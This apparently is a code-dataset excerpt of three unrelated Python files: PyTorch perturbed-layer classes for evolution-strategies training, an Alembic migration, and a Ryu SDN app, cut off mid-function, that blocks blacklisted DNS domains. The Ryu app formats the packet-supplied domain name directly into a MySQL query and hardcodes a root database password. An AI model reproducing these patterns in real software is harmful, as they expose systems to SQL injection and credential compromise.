text stringlengths 38 1.54M |
|---|
import torch
from torch import nn
import torch.nn.functional as F
import torch.nn.modules.utils as module_utils
import time
import random
class PerturbedModel:
def __init__(self, model, directions):
self.model = model
self.directions = directions
self.perturbed_layers = []
def get_perturbed_layers(m):
if isinstance(m, Perturbed):
self.perturbed_layers+=[m]
self.model.apply(get_perturbed_layers)
def forward(self, input, *args):
for l in self.perturbed_layers:
l.perturbed_flag = True
ret = self.model.forward(input, *args)
for l in self.perturbed_layers:
l.perturbed_flag = False
return ret
def __getattr__(self, name):
def ret(*args, **kwargs):
if hasattr(Perturbed, name):
for l in self.perturbed_layers:
getattr(l, name)(*args, **kwargs)
else:
for l in self.perturbed_layers:
l.perturbed_flag = True
res = getattr(self.model, name)(*args, **kwargs)
for l in self.perturbed_layers:
l.perturbed_flag = False
return res
return ret
class Perturbed:
#options["direct"]=True for direct
def __init__(self, directions, antithetic=False, options={}):
self.directions = directions
self.perturbed_flag = False
self.noise_scale = None
self.seed = None
self.antithetic = antithetic
self.options = options
self.free_memory()
def set_noise_scale(self, noise_scale):
self.noise_scale = noise_scale
def set_noise(self, noise_scale=None):
if self.seed is None:
self.set_seed()
if noise_scale is not None:
self.set_noise_scale(noise_scale)
if self.weight_noise is None:
self.allocate_memory()
gen = torch.cuda.manual_seed(self.seed)
if self.options.get("direct"):
if self.antithetic:
self.weight_noise[:self.directions // 2].normal_(std=self.noise_scale, generator=gen)
self.weight_noise[self.directions // 2:] = -self.weight_noise[:self.directions // 2]
self.weight_noise += self.weight
if self.bias is not None:
self.bias_noise[:self.directions // 2].normal_(std=self.noise_scale, generator=gen)
self.bias_noise[self.directions // 2:] = -self.bias_noise[:self.directions // 2]
self.bias_noise += self.bias
else:
self.weight_noise.normal_(std=self.noise_scale, generator=gen)
self.weight_noise += self.weight
if self.bias is not None:
self.bias_noise.normal_(std=self.noise_scale, generator=gen)
self.bias_noise += self.bias
else:
self.weight_noise.normal_(std=self.noise_scale, generator=gen)
if self.bias is not None:
self.bias_noise.normal_(std=self.noise_scale, generator=gen)
def set_seed(self, seed=None):
self.seed = seed if seed is not None else random.randrange(100000000)
def allocate_weight(self):
self.weight_noise = torch.empty((self.directions, )+self.weight.size(),
device=self.weight.device, dtype=self.weight.dtype)
def allocate_bias(self):
if self.bias is not None:
self.bias_noise = torch.empty((self.directions, )+self.bias.size(),
device=self.bias.device, dtype=self.bias.dtype)
def allocate_memory(self):
self.allocate_weight()
if self.bias is not None:
self.allocate_bias()
def free_memory(self):
self.weight_noise = None
if self.bias is not None:
self.bias_noise = None
def weight_grad(self, weights):
if self.options.get("direct"):
if self.antithetic:
weight_noise = self.weight_noise[self.directions // 2:] - self.weight
else:
weight_noise = self.weight_noise - self.weight
else:
weight_noise = self.weight_noise
return (weights @ weight_noise.view(self.directions, -1)).view(*self.weight.size())
def update(self, weights, l1=0, l2=0):
grad = self.weight_grad(weights)
if l1:
grad += l1 * torch.sign(self.weight)
if l2:
grad += l2 * self.weight
self.weight.grad = grad if self.weight.grad is None else self.weight.grad + grad
if self.bias is not None:
if self.options.get("direct"):
if self.antithetic:
bias_noise = self.bias_noise[self.directions // 2:] - self.bias
else:
bias_noise = self.bias_noise - self.bias
else:
bias_noise = self.bias_noise
bias_grad = (weights @ bias_noise.view(self.directions, -1)).view(*self.bias.size())
self.bias.grad = bias_grad if self.bias.grad is None else self.bias.grad + bias_grad
return grad, bias_grad
return grad
class Permuted(Perturbed):
#option["allow_repeats"] for faster sampling, as pytorch currently doesn't have parallel sampling for permutations.
#it allows an input or output to be sampled with replacement.
def __init__(self, in_degree, out_degree, directions, antithetic=False, options={}, permutation="auto",
in_sparsity=0, out_sparsity=0):
Perturbed.__init__(self, directions, antithetic, options)
if permutation == "auto":
if in_sparsity:
if out_sparsity:
permutation = "both"
else:
permutation = "in"
elif out_sparsity:
permutation = "out"
elif 1 < in_degree < 32 and 1 < out_degree < 32:
permutation = "both"
elif in_degree > out_degree:
permutation = "in"
else:
permutation = "out"
if permutation == "both":
self.permute_inputs = True
self.permute_outputs = True
elif permutation == "in":
self.permute_inputs = True
self.permute_outputs = False
elif permutation == "out":
self.permute_inputs = False
self.permute_outputs = True
else:
raise NotImplementedError("Permutation setting not recognized")
self.in_degree = in_degree
self.out_degree = out_degree
self.in_sparsity = max(1, int(in_sparsity * self.in_degree)) if isinstance(in_sparsity, float) else in_sparsity
if self.in_sparsity:
self.permute_inputs = True
else:
self.in_sparsity = self.in_degree
self.out_sparsity = max(1, int(out_sparsity * self.out_degree)) if isinstance(out_sparsity, float) else out_sparsity
if self.out_sparsity:
self.permute_outputs = True
else:
self.out_sparsity = self.out_degree
if options.get("combined") and self.permute_inputs and self.permute_outputs:
raise NotImplementedError("Can't do combined multiplication with both input and output permutations")
def allocate_weight(self):
self.weight_noise = torch.empty(self.out_sparsity, self.in_sparsity, *self.weight.shape[2:],
device=self.weight.device, dtype=self.weight.dtype)
def free_memory(self):
Perturbed.free_memory(self)
self.input_permutations = None
self.output_permutations = None
def set_noise(self, noise_scale=None):
if self.seed is None:
self.set_seed()
if noise_scale is not None:
self.set_noise_scale(noise_scale)
if self.weight_noise is None:
self.allocate_memory()
gen = torch.cuda.manual_seed(self.seed)
rescale = (self.out_degree * self.in_degree / self.out_sparsity / self.in_sparsity) ** .5
self.weight_noise.normal_(std=self.noise_scale * rescale, generator=gen)
if self.bias is not None:
self.bias_noise.normal_(std=self.noise_scale, generator=gen)
if self.options.get("allow_repeats"):
if self.permute_outputs:
self.output_permutations = torch.randint(self.out_degree,
(self.directions, self.out_degree), dtype=torch.short, generator=gen, device=self.weight.device)
if self.permute_inputs:
self.input_permutations = torch.randint(self.in_degree,
(self.directions, self.in_sparsity), dtype=torch.short, generator=gen, device=self.weight.device)
else:
gen = torch.manual_seed(self.seed)
if self.permute_outputs:
self.output_permutations = torch.empty(self.directions, self.out_degree, dtype=torch.short)
for i in range(self.directions):
torch.randperm(self.out_degree, out=self.output_permutations[i], generator=gen)
self.output_permutations = self.output_permutations.to(self.weight.device)
if self.permute_inputs:
self.input_permutations = torch.empty(self.directions, self.in_degree, dtype=torch.short)
for i in range(self.directions):
torch.randperm(self.in_degree, out=self.input_permutations[i], generator=gen)
self.input_permutations = self.input_permutations[:, :self.in_sparsity].to(self.weight.device)
def apply_input_permutation(self, input):
if self.permute_inputs:
input_permutations_1d = (self.input_permutations + (torch.arange(self.directions, device=input.device) * self.in_degree).unsqueeze(1)).flatten()
return torch.index_select(input, 1, input_permutations_1d)
return input
def apply_output_permutation(self, output):
if self.permute_outputs:
output_permutations_1d = (self.output_permutations + (torch.arange(self.directions, device=output.device) * self.out_degree).unsqueeze(1)).flatten()
return torch.index_select(output, 1, output_permutations_1d)
return output
def get_permutation_weights(self, weights):
if self.permute_inputs and self.permute_outputs:
inverse_out = torch.argsort(self.output_permutations, dim=1)[:,:self.out_sparsity]
sp_size = self.out_sparsity * self.in_sparsity
mat_size = self.out_degree * self.in_degree
permutations = self.input_permutations.view(self.directions, 1, self.in_sparsity) + \
(inverse_out * self.in_sparsity).view(self.directions, self.out_sparsity, 1)
ar = torch.arange(sp_size, device=self.weight.device)
permutations_1d = permutations.view(self.directions, sp_size) + ar * mat_size
weighted_perms = torch.zeros((sp_size, mat_size), device=self.weight.device, dtype=self.weight.dtype)
weighted_perms.put_(permutations_1d, weights.view(-1, 1).expand(self.directions, sp_size), accumulate=True)
weighted_perms = weighted_perms.t()
elif self.permute_inputs:
weighted_perms = torch.zeros((self.in_sparsity, self.in_degree), device=self.weight.device, dtype=self.weight.dtype)
ar = torch.arange(self.in_sparsity, device=self.weight.device)
input_permutations_1d = self.input_permutations + ar * self.in_degree
weighted_perms.put_(input_permutations_1d, weights.view(-1,1).expand(self.directions, self.in_sparsity), accumulate=True)
# for i in range(self.in_sparsity):
# weighted_perms[i].put_(self.input_permutations[:,i], weights, accumulate=True)
else:
weighted_perms = torch.zeros((self.out_degree, self.out_degree), device=self.weight.device, dtype=self.weight.dtype)
ar = torch.arange(self.out_degree, device=self.weight.device)
output_permutations_1d = self.output_permutations + ar * self.out_degree
weighted_perms.put_(output_permutations_1d,weights.view(-1,1).expand(self.directions, self.out_degree), accumulate=True)
weighted_perms = weighted_perms[:, :self.out_sparsity]
return weighted_perms
class Synthetic(Perturbed):
def __init__(self, in_degree, out_degree, directions, antithetic=False, options={},
flip="auto", in_sparsity=0, out_sparsity=0):
Perturbed.__init__(self, directions, antithetic, options)
if flip == "auto":
if 1 < in_degree < 32 and 1 < out_degree < 32:
flip = "both"
elif in_degree > out_degree:
flip = "in"
else:
flip = "out"
if flip == "both":
self.flip_inputs = True
self.flip_outputs = True
elif flip == "in":
self.flip_inputs = True
self.flip_outputs = False
elif flip == "out":
self.flip_inputs = False
self.flip_outputs = True
else:
raise NotImplementedError("Flip setting not recognized")
self.in_degree = in_degree
self.out_degree = out_degree
if in_sparsity or out_sparsity:
raise NotImplementedError("Sparsity is not efficient for synthetic sampling, use permuted sampling instead")
self.in_sparsity = self.in_degree
self.out_sparsity = self.out_degree
if options.get("combined") and self.flip_inputs and self.flip_outputs:
raise NotImplementedError("Can't do combined multiplication with both input and output flips")
def allocate_weight(self):
self.weight_noise = torch.empty(self.out_sparsity, self.in_sparsity, *self.weight.shape[2:],
device=self.weight.device, dtype=self.weight.dtype)
def free_memory(self):
Perturbed.free_memory(self)
self.input_flips = None
self.output_flips = None
def set_noise(self, noise_scale=None):
if self.seed is None:
self.set_seed()
if noise_scale is not None:
self.set_noise_scale(noise_scale)
if self.weight_noise is None:
self.allocate_memory()
gen = torch.cuda.manual_seed(self.seed)
rescale = (self.out_degree * self.in_degree / self.out_sparsity / self.in_sparsity) ** .5
self.weight_noise.normal_(std=self.noise_scale * rescale, generator=gen)
if self.bias is not None:
self.bias_noise.normal_(std=self.noise_scale, generator=gen)
if self.flip_outputs:
self.output_flips = 2 * torch.randint(2, size=(self.directions, self.out_degree), dtype=torch.int8,
generator=gen, device=self.weight.device) - 1
if self.flip_inputs:
self.input_flips = 2 * torch.randint(2, size=(self.directions, self.in_degree), dtype=torch.int8,
generator=gen, device=self.weight.device) - 1
def get_flipped_weights(self, weights):
if self.flip_inputs and self.flip_outputs:
return torch.einsum("d,da,db->ab", weights, self.output_flips, self.input_flips * weights.unsqueeze(1))
elif self.flip_inputs:
return (self.input_flips * weights.unsqueeze(1)).sum(dim=0)
else:
return (self.output_flips * weights.unsqueeze(1)).sum(dim=0)
def weight_grad(self, weights):
if self.flip_inputs and self.flip_outputs:
flipped_weights = torch.einsum("d,da,db->ab", weights, self.output_flips, self.input_flips * weights.unsqueeze(1))
for _ in range(len(self.weight.shape) - 2):
flipped_weights = flipped_weights.unsqueeze(-1)
elif self.flip_inputs:
flipped_weights = (self.input_flips * weights.unsqueeze(1)).sum(dim=0).view(1, -1, *[1] * (len(self.weight.shape) - 2))
else:
flipped_weights = (self.output_flips * weights.unsqueeze(1)).sum(dim=0).view(-1, *[1] * (len(self.weight.shape) - 1))
return flipped_weights * self.weight_noise
class PerturbedLinear(nn.Linear, Perturbed):
def __init__(self, in_features, out_features, directions, bias=True, antithetic=False, options={}):
nn.Linear.__init__(self, in_features, out_features, bias)
Perturbed.__init__(self, directions, antithetic, options)
def forward(self, input):
if self.options.get("direct") and self.perturbed_flag:
input_by_direction = input.view(-1, self.directions, self.in_features).permute([1, 0, 2])
if self.bias is not None:
return torch.baddbmm(self.bias_noise.view(self.directions, 1, self.out_features),
input_by_direction,
self.weight_noise.permute([0, 2, 1])).permute([1, 0, 2])
else:
return torch.bmm(input_by_direction,
self.weight_noise.permute([0, 2, 1])).permute([1, 0, 2])
else:
unperturbed = F.linear(input, self.weight, self.bias)
if self.perturbed_flag:
input_by_direction = input.view(-1, self.directions, self.in_features).permute([1, 0, 2])
repeat_size = input_by_direction.size(1)
if self.bias is not None:
perturbations = torch.baddbmm(self.bias_noise.view(self.directions, 1, self.out_features),
input_by_direction,
self.weight_noise.permute([0, 2, 1])).permute([1, 0, 2])
else:
perturbations = torch.bmm(input_by_direction,
self.weight_noise.permute([0, 2, 1])).permute([1, 0, 2])
if self.antithetic:
perturbations[(repeat_size + 1) // 2:] *= -1
add = (unperturbed.view_as(perturbations) + perturbations).view_as(unperturbed)
return add
return unperturbed
class PerturbedConv2d(nn.Conv2d, Perturbed):
def __init__(self, in_channels, out_channels, kernel_size, directions, stride=1,
padding=0, dilation=1, groups=1,
bias=True, antithetic=False, options={}, padding_mode='zeros'):
nn.Conv2d.__init__(self, in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias, padding_mode)
Perturbed.__init__(self, directions, antithetic, options)
#based on https://github.com/pytorch/pytorch/issues/17983
def forward(self, input):
if self.padding_mode != 'zeros':
input = F.pad(input, self._padding_repeated_twice, mode=self.padding_mode)
padding = module_utils._pair(0)
else:
padding = self.padding
if self.options.get("direct") and self.perturbed_flag:
bias_noise = self.bias_noise.view(-1) if self.bias is not None else None
input_view = input.view(-1, self.directions * self.in_channels, *input.size()[-2:])
repeat_size = input_view.size(0)
torch.cuda.synchronize()
perturbations = F.conv2d(input_view, self.weight_noise.view(-1, *self.weight.size()[1:]), None, self.stride,
padding, self.dilation, self.groups * self.directions)
torch.cuda.synchronize()
return perturbations.view(repeat_size, self.directions, self.out_channels, *perturbations.shape[-2:])
else:
unperturbed = F.conv2d(input, self.weight, self.bias, self.stride,
padding, self.dilation, self.groups)
if self.perturbed_flag:
bias_noise = self.bias_noise.view(-1) if self.bias is not None else None
input_view = input.view(-1, self.directions * self.in_channels, *input.size()[-2:])
repeat_size = input_view.size(0)
perturbations = F.conv2d(input_view, self.weight_noise.view(-1, *self.weight.size()[1:]), bias_noise, self.stride,
padding, self.dilation, self.groups * self.directions)
perturbations = perturbations.view(repeat_size, self.directions, self.out_channels,
*perturbations.size()[-2:])
if self.antithetic:
perturbations[(repeat_size + 1) // 2:] *= -1
add = unperturbed + perturbations.view_as(unperturbed)
return add
return unperturbed
class PerturbedAffine(nn.Module, Perturbed):
def __init__(self, normalized_shape, directions, antithetic=False, options={"direct": True}):
nn.Module.__init__(self)
self.weight = nn.Parameter(torch.ones(normalized_shape))
self.bias = nn.Parameter(torch.zeros(normalized_shape))
if not options.get("direct"):
raise NotImplementedError("Only direct is implemented")
Perturbed.__init__(self, directions, antithetic=antithetic, options=options)
def forward(self, input):
if self.perturbed_flag:
weight = self.weight_noise
bias = self.bias_noise
else:
weight = self.weight
bias = self.bias
return input * weight + bias
class PermutedLinear(nn.Linear, Permuted):
def __init__(self, in_features, out_features, directions, bias=True, antithetic=False, options={},
permutation="auto", in_sparsity=0, out_sparsity=0):
nn.Linear.__init__(self, in_features, out_features, bias)
Permuted.__init__(self, in_features, out_features, directions,
antithetic=antithetic, options=options,
permutation=permutation, in_sparsity=in_sparsity, out_sparsity=out_sparsity)
def forward(self, input):
if self.options.get("combined") and self.perturbed_flag:
if self.permute_inputs:
input_view = input.view(-1, self.directions * self.in_features)
permuted_input = self.apply_input_permutation(input_view).view(-1, self.in_sparsity)
combined_input = torch.cat([input.view(-1, self.in_features), permuted_input], dim=1)
combined_weights = torch.cat([self.weight, self.weight_noise], dim=1)
combined_bias = self.bias
return F.linear(combined_input, combined_weights, combined_bias)
elif self.permute_outputs:
input_view = input.view(-1, self.in_features)
repeat_size = input_view.size(0) // self.directions
combined_weights = torch.cat([self.weight, self.weight_noise], dim=0)
if self.out_sparsity < self.out_degree or True:
combined_output = torch.zeros((repeat_size, self.directions * self.out_features, 2), device=input.device, dtype=input.dtype)
torch.mm(input_view, combined_weights.t(), out=combined_output.view(-1, 2 * self.out_features)[:, :self.out_features + self.out_sparsity])
else:
combined_output = torch.mm(input_view, combined_weights.t())
perturbations = combined_output[:, :, 1].view(repeat_size, self.directions * self.out_features)
permuted_output = self.apply_output_permutation(perturbations).view(repeat_size,
self.directions, self.out_features)
if self.bias is not None:
permuted_output += self.bias_noise
if self.antithetic:
permuted_output[(repeat_size + 1) // 2:] *= -1
add = combined_output[:, :, 0].view(-1, self.out_features) + permuted_output.view(-1, self.out_features)
if self.bias is not None:
add += self.bias
return add
else:
unperturbed = F.linear(input, self.weight, self.bias)
if self.perturbed_flag:
input_view = input.view(-1, self.directions * self.in_features)
repeat_size = input_view.size(0)
permuted_input = self.apply_input_permutation(input_view).view(-1, self.in_sparsity)
if self.out_sparsity < self.out_degree:
perturbations = torch.zeros_like(unperturbed)
torch.mm(permuted_input, self.weight_noise.t(), out=perturbations.view(-1, self.out_features)[:, :self.out_sparsity])
perturbations = perturbations.view(repeat_size,
self.directions * self.out_features)
else:
perturbations = torch.mm(permuted_input, self.weight_noise.t()).view(repeat_size,
self.directions * self.out_features)
permuted_output = self.apply_output_permutation(perturbations).view(repeat_size, self.directions, self.out_features)
if self.bias is not None:
permuted_output += self.bias_noise
if self.antithetic:
permuted_output[(repeat_size + 1) // 2:] *= -1
add = unperturbed + permuted_output.view_as(unperturbed)
return add
return unperturbed
def weight_grad(self, weights):
permutation_weights = self.get_permutation_weights(weights)
if self.permute_inputs and self.permute_outputs:
return torch.mm(permutation_weights, self.weight_noise.view(-1, 1)).reshape(self.out_features, self.in_features)
elif self.permute_inputs:
return torch.mm(self.weight_noise, permutation_weights)
else:
return torch.mm(permutation_weights, self.weight_noise)
class PermutedConv2d(nn.Conv2d, Permuted):
def __init__(self, in_channels, out_channels, kernel_size, directions, stride=1,
padding=0, dilation=1, groups=1,
bias=True, antithetic=False, options={},
padding_mode='zeros', permutation="auto", in_sparsity=0, out_sparsity=0):
nn.Conv2d.__init__(self, in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias, padding_mode)
Permuted.__init__(self, in_channels, out_channels, directions,
antithetic=antithetic, options=options,
permutation=permutation, in_sparsity=in_sparsity, out_sparsity=out_sparsity)
def forward(self, input):
if self.padding_mode != 'zeros':
input = F.pad(input, self._padding_repeated_twice, mode=self.padding_mode)
padding = module_utils._pair(0)
else:
padding = self.padding
if self.options.get("combined") and self.perturbed_flag:
if self.permute_inputs:
input_dims = input.shape[-2:]
input_view = input.view(-1, self.directions * self.in_channels, *input_dims)
repeat_size = input_view.size(0)
permuted_input = self.apply_input_permutation(input_view).view(-1, self.in_sparsity, *input_dims)
if self.antithetic:
permuted_input.view(repeat_size, self.directions, self.in_sparsity, *input_dims)[(repeat_size + 1) // 2:] *= -1
combined_input = torch.cat([input.view(-1, self.in_channels, *input_dims), permuted_input], dim=1)
combined_weights = torch.cat([self.weight, self.weight_noise], dim=1)
result = F.conv2d(combined_input, combined_weights, self.bias, self.stride,
padding, self.dilation, self.groups)
if self.bias is not None:
if self.antithetic:
result.view(repeat_size, self.directions, *result.shape[1:])[:(repeat_size + 1) // 2] += self.bias_noise.unsqueeze(-1).unsqueeze(-1)
result.view(repeat_size, self.directions, *result.shape[1:])[(repeat_size + 1) // 2:] -= self.bias_noise.unsqueeze(-1).unsqueeze(-1)
else:
return result + self.bias_noise.unsqueeze(-1).unsqueeze(-1)
return result
else:
unperturbed = F.conv2d(input, self.weight, self.bias, self.stride,
padding, self.dilation, self.groups)
if self.perturbed_flag:
input_dims = input.shape[-2:]
output_dims = unperturbed.shape[-2:]
input_view = input.view(-1, self.directions * self.in_channels, *input_dims)
repeat_size = input_view.size(0)
permuted_input = self.apply_input_permutation(input_view).view(-1, self.in_sparsity, *input_dims)
if self.out_sparsity < self.out_degree:
perturbations = torch.zeros_like(unperturbed)
perturbations.view(-1, self.out_channels, *output_dims)[:, :self.out_sparsity] = \
F.conv2d(permuted_input, self.weight_noise, None, self.stride, padding, self.dilation, self.groups)
else:
perturbations = F.conv2d(permuted_input, self.weight_noise, None, self.stride,
padding, self.dilation, self.groups)
# permuted_input = self.apply_input_permutation(input_view).view_as(input)
# print(input.shape,permuted_input.shape,input_view.shape)
# perturbations = F.conv2d(permuted_input, self.weight_noise, None, self.stride,
# padding, self.dilation, self.groups)
permuted_output = self.apply_output_permutation(perturbations.view(repeat_size, self.directions * self.out_channels,
*perturbations.shape[-2:])).view_as(unperturbed)
if self.bias is not None:
permuted_output += self.bias_noise.unsqueeze(-1).unsqueeze(-1)
if self.antithetic:
permuted_output.view(repeat_size, -1)[(repeat_size + 1) // 2:] *= -1
add = unperturbed + permuted_output
return add
return unperturbed
def weight_grad(self, weights):
permutation_weights = self.get_permutation_weights(weights)
if self.permute_inputs and self.permute_outputs:
sp_size = self.out_sparsity * self.in_sparsity
return torch.mm(permutation_weights, self.weight_noise.view(sp_size, -1)).view_as(self.weight)
elif self.permute_inputs:
return torch.mm(self.weight_noise.permute([0,2,3,1]).contiguous().view(-1,self.in_sparsity),
permutation_weights).view(self.out_channels, *self.kernel_size,self.in_channels).permute([0,3,1,2])
else:
return torch.mm(permutation_weights, self.weight_noise.view(self.out_sparsity,-1)).view_as(self.weight)
class SyntheticLinear(nn.Linear, Synthetic):
def __init__(self, in_features, out_features, directions, bias=True, antithetic=False, options={},
flip="auto", in_sparsity=0, out_sparsity=0):
nn.Linear.__init__(self, in_features, out_features, bias)
Synthetic.__init__(self, in_features, out_features, directions,
antithetic=antithetic, options=options,
flip=flip, in_sparsity=in_sparsity, out_sparsity=out_sparsity)
def forward(self, input):
if self.options.get("combined") and self.perturbed_flag:
pass
else:
unperturbed = F.linear(input, self.weight, self.bias)
if self.perturbed_flag:
input_view = input.view(-1, self.directions, self.in_features)
repeat_size = input_view.size(0)
flipped_input = input_view * self.input_flips if self.flip_inputs else input_view
perturbations = flipped_input @ self.weight_noise.t()
flipped_output = (perturbations * self.output_flips if self.flip_outputs else perturbations)
if self.bias is not None:
flipped_output += self.bias_noise
if self.antithetic:
flipped_output[(repeat_size + 1) // 2:] *= -1
add = unperturbed + flipped_output.view_as(unperturbed)
return add
return unperturbed
class SyntheticConv2d(nn.Conv2d, Synthetic):
def __init__(self, in_channels, out_channels, kernel_size, directions, stride=1,
padding=0, dilation=1, groups=1,
bias=True, antithetic=False, options={},
padding_mode='zeros', flip="auto", in_sparsity=0, out_sparsity=0):
nn.Conv2d.__init__(self, in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias, padding_mode)
Synthetic.__init__(self, in_channels, out_channels, directions,
antithetic=antithetic, options=options,
flip=flip, in_sparsity=in_sparsity, out_sparsity=out_sparsity)
def forward(self, input):
if self.padding_mode != 'zeros':
input = F.pad(input, self._padding_repeated_twice, mode=self.padding_mode)
padding = module_utils._pair(0)
else:
padding = self.padding
if self.options.get("combined") and self.perturbed_flag:
pass
else:
unperturbed = F.conv2d(input, self.weight, self.bias, self.stride,
padding, self.dilation, self.groups)
if self.perturbed_flag:
input_dims = input.shape[-2:]
output_dims = unperturbed.shape[-2:]
input_view = input.view(-1, self.directions, self.in_channels, *input_dims)
repeat_size = input_view.size(0)
flipped_input = input_view * self.input_flips.unsqueeze(2).unsqueeze(3) if self.flip_inputs else input_view
perturbations = F.conv2d(flipped_input.view(-1, self.in_sparsity, *input_dims), self.weight_noise, None, self.stride,
padding, self.dilation, self.groups)
flipped_output = (perturbations * self.output_flips.unsqueeze(2).unsqueeze(3) if self.flip_outputs else perturbations)
if self.bias is not None:
flipped_output += self.bias_noise.unsqueeze(-1).unsqueeze(-1)
if self.antithetic:
flipped_output.view(repeat_size, -1)[(repeat_size + 1) // 2:] *= -1
add = unperturbed + flipped_output
return add
return unperturbed
|
"""is_visible and is_required for Action model
Revision ID: 14b482ad5574
Revises: 333833cebe88
Create Date: 2015-01-22 12:24:56.428785
"""
# revision identifiers, used by Alembic.
revision = '14b482ad5574'
down_revision = '333833cebe88'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('action', sa.Column('is_required', sa.Boolean(), nullable=True))
op.add_column('action', sa.Column('is_visible', sa.Boolean(), nullable=True))
op.drop_column('action', 'action_type')
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('action', sa.Column('action_type', sa.VARCHAR(length=255), autoincrement=False, nullable=False))
op.drop_column('action', 'is_visible')
op.drop_column('action', 'is_required')
### end Alembic commands ###
|
# Copyright (C) 2011 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.controller.handler import CONFIG_DISPATCHER, MAIN_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_3
from ryu.lib.packet import packet
from ryu.lib.packet import ethernet
from ryu.lib.packet import ipv4
from ryu.lib.packet import tcp
from ryu.lib.packet import udp
from ryu.ofproto import inet
from ryu.ofproto import ether
from ryu import utils
import binascii
from dnslib.dns import DNSRecord
import MySQLdb
#WEB_lacklist = ["www.taobao.com", "www.icbc.com.cn"]
class SimpleSwitch13(app_manager.RyuApp):
OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]
def __init__(self, *args, **kwargs):
super(SimpleSwitch13, self).__init__(*args, **kwargs)
self.mac_to_port = {}
@set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)
def switch_features_handler(self, ev):
datapath = ev.msg.datapath
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
# add goto table 1 flow entry on table 0
match = parser.OFPMatch()
inst = [parser.OFPInstructionGotoTable(table_id=1)]
self.add_flow(datapath, 0, match, table_id=0, inst=inst)
# install table-miss flow entry on table 1
actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,
ofproto.OFPCML_NO_BUFFER)]
self.add_flow(datapath, 0, match, actions, table_id=1)
# install udp_dst_port 50 flow entry on table 0 to match DNS request
# packet.
match = parser.OFPMatch(
eth_type=ether.ETH_TYPE_IP, ip_proto=inet.IPPROTO_UDP, udp_dst=53)
self.add_flow(datapath, 10, match, actions, table_id=0)
def add_flow(self, datapath, priority, match, actions=[], table_id=0,
idle_timeout=0, hard_timeout=0, buffer_id=None, inst=None):
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
if not inst:
inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,
actions)]
if buffer_id:
mod = parser.OFPFlowMod(datapath=datapath, table_id=table_id, idle_timeout=idle_timeout, hard_timeout=hard_timeout,
buffer_id=buffer_id, priority=priority, match=match, instructions=inst)
else:
mod = parser.OFPFlowMod(datapath=datapath, priority=priority, table_id=table_id, idle_timeout=idle_timeout,
hard_timeout=hard_timeout, match=match, instructions=inst)
datapath.send_msg(mod)
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _packet_in_handler(self, ev):
# If you hit this you might want to increase
# the "miss_send_length" of your switch
if ev.msg.msg_len < ev.msg.total_len:
self.logger.debug("packet truncated: only %s of %s bytes",
ev.msg.msg_len, ev.msg.total_len)
msg = ev.msg
datapath = msg.datapath
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
pkt = packet.Packet(msg.data)
eth = pkt.get_protocols(ethernet.ethernet)[0]
# judge "DNS packet"
pkt_ipv4 = pkt.get_protocol(ipv4.ipv4)
if pkt_ipv4:
if(pkt_ipv4.proto == inet.IPPROTO_UDP):
pkt_udp = pkt.get_protocol(udp.udp)
if 53 == pkt_udp.dst_port:
print " DNS request:dst_prot", pkt_udp.dst_port
self._badWeb_Potect(datapath, msg)
else:
self._forwarding(datapath, msg)
# bad web judge and protection
def _badWeb_Potect(self, datapath, msg):
print "in _badWeb_Potect"
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
pkt = packet.Packet(msg.data)
hdata = utils.hex_array(msg.data)
hdata = hdata.split(' ')
hex_data = ''
for hexdata in hdata:
cc = hexdata.replace('0x', '')
if len(cc) == 1:
cc = '0%s' % cc
hex_data = hex_data + cc
# print "hex_data", hex_data
# print 'pkt:', pkt
hex_dnsdata = hex_data[84:]
# print "dns hex data", hex_dnsdata
dns_binary = binascii.unhexlify(hex_dnsdata)
dns = DNSRecord.parse(dns_binary)
# print 'dns:', dns
dns
web_name = dns.questions[0].get_qname().label
web_name = ".".join(list(web_name))
# print web_name
try:
conn = MySQLdb.connect(
host='localhost', user='root', passwd='123456', db='web', port=3306)
cur = conn.cursor()
select = 'select * from WEB_lacklist where name="%s"' % web_name
if(cur.execute(select)):
print ' ilegal web "%s", it`s dangerous! you can`t to access it.' % web_name
cur.close()
conn.close()
return
else:
print 'legal web "%s",you can access it.' % web_name
cur.close()
conn.close()
self._forwarding(datapath, msg)
except MySQLdb.Error, e:
print "Mysql Error %d: %s" % (e.args[0], e.args[1])
# for web in WEB_lacklist:
# if web_name == web:
# print "ilegal web, you can`t to access."
# return
# else:
# self._forwarding(datapath, msg)
def _forwarding(self, datapath, msg):
print "in _forwarding..."
datapath = msg.datapath
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
in_port = msg.match['in_port']
pkt = packet.Packet(msg.data)
eth = pkt.get_protocols(ethernet.ethernet)[0]
dst = eth.dst
src = eth.src
dpid = datapath.id
self.mac_to_port.setdefault(dpid, {})
# learn a mac address to avoid FLOOD next time.
self.mac_to_port[dpid][src] = in_port
if dst in self.mac_to_port[dpid]:
out_port = self.mac_to_port[dpid][dst]
else:
out_port = ofproto.OFPP_FLOOD
actions = [parser.OFPActionOutput(out_port)]
# install a flow to avoid packet_in next time
if out_port != ofproto.OFPP_FLOOD:
match = parser.OFPMatch(in_port=in_port, eth_dst=dst)
# verify if we have a valid buffer_id, if yes avoid to send both
# flow_mod & packet_out
